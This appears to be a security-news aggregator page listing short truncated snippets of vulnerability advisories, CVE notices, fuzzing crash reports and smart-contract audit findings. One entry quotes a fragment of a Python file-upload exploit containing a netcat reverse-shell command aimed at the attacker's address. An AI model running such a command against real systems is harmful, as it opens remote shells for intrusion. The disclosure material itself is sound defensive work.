WWBN AVideo checkLoginAttempts login attempt restriction bypass vulnerability

Talos Vulnerability Report TALOS-2023-1898 WWBN AVideo checkLoginAttempts login attempt restriction bypass vulnerability January 10, 2024 CVE Number CVE-2023-49810 SUMMARY A login attempt restriction bypass vulnerability exists in the checkLoginAttempts functionality of WWBN AVideo dev master...

Out-of-bounds

A vulnerability has been identified in Solid Edge SE2023 All versions V223.0 Update 10. The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the...

[SECURITY] Fedora 39 Update: podman-tui-0.15.0-1.fc39

podman-tui is a terminal user interface for Podman v4. podman-tui is using podman.socket service to communicate with podman environm ent and SSH to connect to remote podman machines...

CVE-2023-44221

creationtimestamp| type| source ---|---|--- 2023-12-24 15:26:20+00:00| seen| https://t.me/ctinow/159038 2025-04-30 16:18:31+00:00| seen| https://infosec.exchange/users/cR0w/statuses/114427816217281348 2025-04-30 18:14:13+00:00| seen| https://t.me/DarkWebInformerCVEAlerts/14107 2025-05-01...

GHSA-W8VH-P74J-X9XP yii2-authclient vulnerable to possible timing attack on string comparison in OAuth1, OAuth2 and OpenID Connect implementation

Impact What kind of vulnerability is it? Who is impacted? Original Report: The Oauth1/2 "state" and OpenID Connect "nonce" is vulnerable for a "timing attack" since it's compared via regular string comparison instead of Yii::$app-getSecurity-compareString. Affected Code: 1. OAuth 1 "state"...

Input Reflected

This is an informational plugin to inform that user data controlled input is reflected in the response. No source data...

OSV-2023-1302 Global-buffer-overflow in pcre_get_compiled_regex_cache_ex

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65030 Crash type: Global-buffer-overflow READ 1 Crash state: pcregetcompiledregexcacheex phpreplaceinsubject pregreplacecommon...

online.moysklad.ru Cross Site Scripting vulnerability OBB-3810857

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

Incorrect Condition for Validating Input and Output Tokens in CurveTricryptoAdapter::_determineComputeType Function

Lines of code Vulnerability details Impact The contract contains a bug in the determineComputeType function, where the condition for checking if the input and output tokens are valid for swapping is incorrect. This bug may lead to unexpected behavior and incorrect computation of the compute type...

CVE-2023-39326 vulnerabilities

Vulnerabilities for packages: prometheus-beat-exporter-fips, cni-plugins-fips, mage, kube-logging-logging-operator, petname, metrics-server, hubble-ui, bank-vaults-fips, prometheus-stackdriver-exporter, configmap-reload-fips, ctop, fulcio-fips, flannel-cni-plugin, go-bindata, gobuster, gops,...

China's bidding and tendering public service platform has information leakage vulnerability

China's bidding and tendering public service platform provides market public information services for bidding and tendering transaction platforms and parties, realizing the pooling, sharing, dynamics and openness of market information, and providing data support for regulating and supervising the...

CVE-2023-33092 Buffer Copy Without Checking Size of Input in Bluetooth HOST

Memory corruption while processing pin reply in Bluetooth, when pin code received from APP layer is greater than expected size...

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

GHSA-VMQ6-5M68-F53M vulnerabilities

Vulnerabilities for packages: tez, trino, zookeeper...

Interface improperly implemented

Lines of code 34, 34, 34, 34, 30, 31, 32, 34, 35, 38https://github.com/Tapioca-DAO/tapioca-yieldbox-strategies-audi...

RHEL 8 : firefox (RHSA-2023:7569)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2023:7569 advisory. Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox...

OSV-2023-1227 Stack-buffer-overflow in io_memory_read

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64529 Crash type: Stack-buffer-overflow WRITE 11 Crash state: iomemoryread riopluginread riodescread...

Funds cannot be withdrawn from EigenLayer

Lines of code Vulnerability details Impact NodeDelegator contracts handle depositing LSTs into EigenLayer to earn yield. However the contract lacks functions to withdraw those tokens afterwards, meaning they will become trapped in the EigenLayer protocol. This breaks the functionality of the...

Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak: Im speaking at the AI Summit New York on December 6, 2023. The list is maintained on this page...

OSV-2023-1154 Heap-buffer-overflow in pcpp::SomeIpSdEntry::SomeIpSdEntry

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64127 Crash type: Heap-buffer-overflow READ 4 Crash state: pcpp::SomeIpSdEntry::SomeIpSdEntry pcpp::SomeIpSdLayer::getEntries readParsedPacket...